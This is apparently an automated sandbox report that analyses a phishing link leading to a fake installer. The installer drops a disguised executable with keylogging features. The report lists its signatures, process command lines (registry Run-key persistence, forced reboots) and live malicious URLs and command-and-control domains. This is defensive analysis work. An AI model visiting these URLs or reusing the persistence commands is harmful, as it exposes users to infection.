Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://tinyurl.com/2abosd8k

Overview

General Information

Sample URL:https://tinyurl.com/2abosd8k
Analysis ID:854202
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic
Uses cmd line tools excessively to alter registry or file data
Contains functionality to log keystrokes (.Net Source)
Uses shutdown.exe to shutdown or reboot the system
.NET source code contains potential unpacker
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Uses insecure TLS / SSL version for HTTPS connection
Searches for user specific document files
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • cmd.exe (PID: 1396 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://tinyurl.com/2abosd8k" > cmdline.out 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wget.exe (PID: 6876 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://tinyurl.com/2abosd8k" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • chrome.exe (PID: 6996 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\empresa01.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 7056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1764 --field-trial-handle=1816,i,4260702216927358363,7023541832913782999,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • unarchiver.exe (PID: 8128 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
      • 7za.exe (PID: 8152 cmdline: C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx" "C:\Users\user\Downloads\Or amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 4692 cmdline: cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • msiexec.exe (PID: 7084 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx\M Contrato UK .msi" MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 6636 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 7112 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 497B8A54F042C624761329931378FB15 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • cmd.exe (PID: 7664 cmdline: C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe"" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 7176 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tqVXfZhGNW /t reg_sz /d """"C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe""" MD5: CEE2A7E57DF2A159A065A34913A055C2)
          • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 7752 cmdline: "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60 MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 5068 cmdline: shutdown -r -f -t 60 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
      • cmd.exe (PID: 1848 cmdline: "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • shutdown.exe (PID: 4984 cmdline: shutdown /r /t 1 /f MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
  • openshot-qt.exe (PID: 6880 cmdline: "C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe" MD5: 29C35D09065CC6A59E2C5C88175C91ED)
  • openshot-qt.exe (PID: 5508 cmdline: "C:\Users\Public\Documents\tqVXfZhGNW\openshot-qt.exe" MD5: 29C35D09065CC6A59E2C5C88175C91ED)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.354.204.22.19849716802849813 04/26/23-09:01:40.583092
SID:2849813
Source Port:49716
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.354.204.22.19849716802849814 04/26/23-09:01:40.583092
SID:2849814
Source Port:49716
Destination Port:80
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 5.181.156.27:443 -> 192.168.2.3:49717 version: TLS 1.0
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
Source: unknownHTTPS traffic detected: 172.67.1.225:443 -> 192.168.2.3:49696 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.65:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.143.234.120:443 -> 192.168.2.3:49698 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
Source: Binary string: wininet.pdb source: shi5809.tmp.17.dr
Source: Binary string: C:\JobRelease\win\Release\bin\x86\embeddeduiproxy.pdb source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, 45a20c.msi.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: 45a20c.msi.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: d3d12.pdbUGP source: shi5914.tmp.17.dr
Source: Binary string: d3d12.pdb source: shi5914.tmp.17.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdbu source: MSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb\ source: 45a20c.msi.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\Users\Pichau\Documents\SISTEMANOVO\SISTEMA2.0 - DLL - TIMER - RENOMEAR - ESCONDER - KLTODOGB - SHOT - COMPACT\Bin\Debug\libpython3.8.pdb source: openshot-qt.exe, openshot-qt.exe, 00000021.00000002.530094057.000000006A102000.00000020.00000001.01000000.00000008.sdmp, openshot-qt.exe, 00000021.00000002.529225253.0000000003372000.00000020.00000001.01000000.00000008.sdmp, libpython3.8.dll.17.dr
Source: Binary string: wininet.pdbUGP source: shi5809.tmp.17.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\InstallerAnalytics.pdb source: MSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI76D8.tmp.15.dr, M Contrato UK .msi.8.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbg source: MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI76D8.tmp.15.dr, M Contrato UK .msi.8.dr
Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile opened: c:Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

Networking

barindex
Source: TrafficSnort IDS: 2849814 ETPRO MALWARE TakeMyFile User-Agent 192.168.2.3:49716 -> 54.204.22.198:80
Source: TrafficSnort IDS: 2849813 ETPRO MALWARE TakeMyFile Installer Checkin 192.168.2.3:49716 -> 54.204.22.198:80
Source: unknownHTTPS traffic detected: 5.181.156.27:443 -> 192.168.2.3:49717 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: shi5809.tmp.17.drString found in binary or memory: http://.css
Source: shi5809.tmp.17.drString found in binary or memory: http://.jpg
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: MSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://collect.installeranalytics.com
Source: wget.exe, 00000002.00000002.260585684.0000000002D68000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.260147535.0000000002D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: wget.exe, 00000002.00000002.260585684.0000000002D68000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260438119.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.260147535.0000000002D64000.00000004.00000020.00020000.00000000.sdmp, openshot-qt.exe, 00000020.00000002.528475350.0000000000922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: shi5809.tmp.17.drString found in binary or memory: http://html4/loose.dtd
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mondialarqcondicetchat.com
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://ocsp.digicert.com0C
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://ocsp.digicert.com0O
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000021.00000002.529577377.0000000003811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chromecache_159.4.drString found in binary or memory: http://stuartk.com/jszip
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://t2.symcb.com0
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://tl.symcd.com0&
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: http://www.digicert.com/CPS0
Source: shi5809.tmp.17.drString found in binary or memory: https://HTTP/1.1
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amxx1515cabreun23.asxo
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000020.00000002.529546442.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000020.00000002.529546442.0000000002B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amxx1515cabreun23.asxo/
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002B32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amxx1515cabreun23.asxo4
Source: empresa01.html.2.drString found in binary or memory: https://bit.ly/3oDy7mm
Source: empresa01.html.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.5/FileSaver.min.js
Source: empresa01.html.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js
Source: empresa01.html.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jszip-utils/0.1.0/jszip-utils.min.js
Source: empresa01.html.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jszip/3.6.0/jszip.min.js
Source: MSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: https://collect.installeranalytics.com
Source: MSI77A4.tmp.15.dr, 45a20c.msi.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic
Source: cmdline.out.0.drString found in binary or memory: https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.html
Source: wget.exe, 00000002.00000003.260103939.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.259511384.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260635446.0000000002DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.htmlQ
Source: wget.exe, 00000002.00000003.260103939.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260635446.0000000002DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.htmlk
Source: wget.exe, 00000002.00000003.254152777.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.254152777.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.260103939.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.259511384.0000000002DAD000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260635446.0000000002DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DurableDeepLinkUi/external
Source: cmdline.out.0.drString found in binary or memory: https://empresas01.page.link/V9Hh?24774833624
Source: wget.exe, 00000002.00000002.260585684.0000000002D68000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.260147535.0000000002D64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas01.page.link/V9Hh?24774833624:
Source: msiexec.exeString found in binary or memory: https://firebasestorage.googleapis.com/v0/b/zagschatserv.appspot.com/o/t
Source: chromecache_159.4.drString found in binary or memory: https://github.com/nodeca/pako/blob/master/LICENSE
Source: empresa01.html.2.drString found in binary or memory: https://img001.prntscr.com/file/img001/LwwKUVJ1RTKn0DIWa1bTlw.png
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mondialarqcondicetchat.com
Source: openshot-qt.exe, 00000021.00000002.529577377.0000000003811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mondialarqcondicetchat.com/Alienware/index.php
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, openshot-qt.exe, 00000021.00000002.529577377.0000000003811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mondialarqcondicetchat.com/Alienware/index.phpT
Source: openshot-qt.exe, 00000020.00000002.529546442.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mondialarqcondicetchat.com4
Source: chromecache_159.4.drString found in binary or memory: https://raw.github.com/Stuk/jszip/master/LICENSE.markdown.
Source: wget.exe, 00000002.00000002.260303687.00000000001D0000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.260418045.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: https://tinyurl.com/2abosd8k
Source: 7za.exe, 00000008.00000003.300985145.0000000000830000.00000004.00000800.00020000.00000000.sdmp, MSI77A4.tmp.15.dr, MSI6D3F.tmp.15.dr, MSI6BA7.tmp.15.dr, 45a20c.msi.15.dr, MSI6CB1.tmp.15.dr, MSI6B19.tmp.15.dr, MSI795E.tmp.15.dr, MSI71C6.tmp.15.dr, MSI7129.tmp.15.dr, MSI76D8.tmp.15.dr, MSI6DAD.tmp.15.dr, M Contrato UK .msi.8.drString found in binary or memory: https://www.advancedinstaller.com
